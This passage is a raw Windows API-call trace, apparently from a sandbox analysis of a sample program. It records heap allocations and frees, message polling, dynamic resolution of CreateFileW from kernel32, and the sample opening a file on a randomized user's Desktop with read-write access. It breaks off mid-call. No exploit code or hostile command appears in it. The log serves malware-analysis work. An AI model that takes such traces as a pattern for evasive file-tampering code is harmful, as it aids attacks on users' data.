PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.092] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.092] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.092] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae80 [0075.092] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb398 [0075.092] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.092] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.092] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.092] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1c8 [0075.092] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb398 [0075.092] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.092] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.092] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.092] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae80 [0075.092] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb398 [0075.092] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.092] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.092] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.092] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5b8 [0075.092] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb398 [0075.092] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.092] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.092] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.092] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae80 [0075.092] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb398 [0075.093] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.093] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.093] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.093] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.093] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.093] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.093] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.093] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.093] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.093] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5b8 [0075.093] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb398 [0075.093] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.093] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.093] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.093] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae80 [0075.093] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb398 [0075.093] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.093] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.093] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.093] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5b8 [0075.093] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb398 [0075.093] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.093] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.093] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.093] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae80 [0075.093] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb398 [0075.093] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.093] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.093] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5b8 [0075.093] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb378 [0075.093] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae80 [0075.093] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfa0 [0075.093] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb398 [0075.094] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0075.094] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e060 [0075.094] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4a8 [0075.094] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb458 [0075.094] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e090 [0075.094] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.094] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e060 [0075.094] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5f8 [0075.094] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.094] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e090 [0075.094] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x76e090, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0075.094] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0075.094] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0075.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb538 | out: hHeap=0x650000) returned 1 [0075.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4d8 | out: hHeap=0x650000) returned 1 [0075.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb598 | out: hHeap=0x650000) returned 1 [0075.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0075.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de00 | out: hHeap=0x650000) returned 1 [0075.095] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-bwohngaeohzwnbtd\\bhg xz5nypyf_.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0075.095] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4c8 [0075.095] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792238 [0075.095] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de00 [0075.095] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e060 [0075.095] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e090 [0075.095] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e078 [0075.095] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb598 [0075.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0075.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb598 | out: hHeap=0x650000) returned 1 [0075.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e090 | out: hHeap=0x650000) returned 1 [0075.095] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e090 [0075.095] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e078 [0075.095] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df58 [0075.095] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb598 [0075.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0075.095] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xa0) returned 0x6998e0 [0075.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x771fe8 | out: hHeap=0x650000) returned 1 [0075.095] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df58 [0075.095] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b090 [0075.095] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e360 [0075.095] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4d8 [0075.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e360 | out: hHeap=0x650000) returned 1 [0075.096] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4d8 | out: hHeap=0x650000) returned 1 [0075.096] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0075.096] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b090 [0075.096] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e360 [0075.096] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4c8 [0075.096] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4d8 [0075.096] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4c8 | out: hHeap=0x650000) returned 1 [0075.096] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4d8 | out: hHeap=0x650000) returned 1 [0075.096] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e360 | out: hHeap=0x650000) returned 1 [0075.096] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e360 [0075.096] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4c8 [0075.096] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0f0 [0075.096] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4d8 [0075.096] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0075.096] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4d8 | out: hHeap=0x650000) returned 1 [0075.096] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4c8 | out: hHeap=0x650000) returned 1 [0075.096] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4c8 [0075.096] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0f0 [0075.096] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e240 [0075.096] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4d8 [0075.096] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0075.096] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4d8 | out: hHeap=0x650000) returned 1 [0075.096] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0075.096] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0f0 [0075.096] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e240 [0075.096] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e318 [0075.096] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4d8 [0075.096] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e318 | out: hHeap=0x650000) returned 1 [0075.096] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4d8 | out: hHeap=0x650000) returned 1 [0075.096] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0075.096] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e240 [0075.097] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e318 [0075.097] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4b0 [0075.097] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4d8 [0075.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4b0 | out: hHeap=0x650000) returned 1 [0075.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4d8 | out: hHeap=0x650000) returned 1 [0075.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e318 | out: hHeap=0x650000) returned 1 [0075.097] FreeLibrary (hLibModule=0x76d30000) returned 1 [0075.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x650000) returned 1 [0075.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4f8 | out: hHeap=0x650000) returned 1 [0075.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0075.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb428 | out: hHeap=0x650000) returned 1 [0075.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0075.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0075.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dae0 | out: hHeap=0x650000) returned 1 [0075.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfe8 | out: hHeap=0x650000) returned 1 [0075.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0075.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0075.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfa0 | out: hHeap=0x650000) returned 1 [0075.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e570 | out: hHeap=0x650000) returned 1 [0075.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af70 | out: hHeap=0x650000) returned 1 [0075.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ada8 | out: hHeap=0x650000) returned 1 [0075.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0075.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e2e8 | out: hHeap=0x650000) returned 1 [0075.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0075.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0075.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e030 | out: hHeap=0x650000) returned 1 [0075.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e018 | out: hHeap=0x650000) returned 1 [0075.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1c8 | out: hHeap=0x650000) returned 1 [0075.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1b0 | out: hHeap=0x650000) returned 1 [0075.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e168 | out: hHeap=0x650000) returned 1 [0075.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e498 | out: hHeap=0x650000) returned 1 [0075.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e420 | out: hHeap=0x650000) returned 1 [0075.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e300 | out: hHeap=0x650000) returned 1 [0075.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e630 | out: hHeap=0x650000) returned 1 [0075.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e708 | out: hHeap=0x650000) returned 1 [0075.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0075.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e198 | out: hHeap=0x650000) returned 1 [0075.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0075.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e120 | out: hHeap=0x650000) returned 1 [0075.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0075.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e378 | out: hHeap=0x650000) returned 1 [0075.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0d8 | out: hHeap=0x650000) returned 1 [0075.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0c0 | out: hHeap=0x650000) returned 1 [0075.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e108 | out: hHeap=0x650000) returned 1 [0075.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x696ad0 | out: hHeap=0x650000) returned 1 [0075.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb398 | out: hHeap=0x650000) returned 1 [0075.098] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.098] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb398 [0075.098] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a3dc8 [0075.098] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb468 [0075.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a3dc8 | out: hHeap=0x650000) returned 1 [0075.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0075.098] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0075.098] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0075.098] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9708 [0075.098] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3f8 [0075.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0075.098] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3f8 [0075.098] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0075.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0075.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0075.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9708 | out: hHeap=0x650000) returned 1 [0075.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0075.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb398 | out: hHeap=0x650000) returned 1 [0075.098] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.098] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb398 [0075.098] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0075.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0075.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb398 | out: hHeap=0x650000) returned 1 [0075.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b588 | out: hHeap=0x650000) returned 1 [0075.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df70 | out: hHeap=0x650000) returned 1 [0075.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dbd0 | out: hHeap=0x650000) returned 1 [0075.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0075.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db58 | out: hHeap=0x650000) returned 1 [0075.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e438 | out: hHeap=0x650000) returned 1 [0075.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e228 | out: hHeap=0x650000) returned 1 [0075.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0075.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df90 | out: hHeap=0x650000) returned 1 [0075.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b168 | out: hHeap=0x650000) returned 1 [0075.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d928 | out: hHeap=0x650000) returned 1 [0075.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0075.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dba8 | out: hHeap=0x650000) returned 1 [0075.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6c0 | out: hHeap=0x650000) returned 1 [0075.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0075.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0075.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df88 | out: hHeap=0x650000) returned 1 [0075.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfd0 | out: hHeap=0x650000) returned 1 [0075.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dec8 | out: hHeap=0x650000) returned 1 [0075.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0075.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4f8 | out: hHeap=0x650000) returned 1 [0075.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0075.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db80 | out: hHeap=0x650000) returned 1 [0075.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3d8 | out: hHeap=0x650000) returned 1 [0075.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db30 | out: hHeap=0x650000) returned 1 [0075.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0075.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd88 | out: hHeap=0x650000) returned 1 [0075.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abc8 | out: hHeap=0x650000) returned 1 [0075.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0075.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc98 | out: hHeap=0x650000) returned 1 [0075.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0075.099] HeapFree (in: 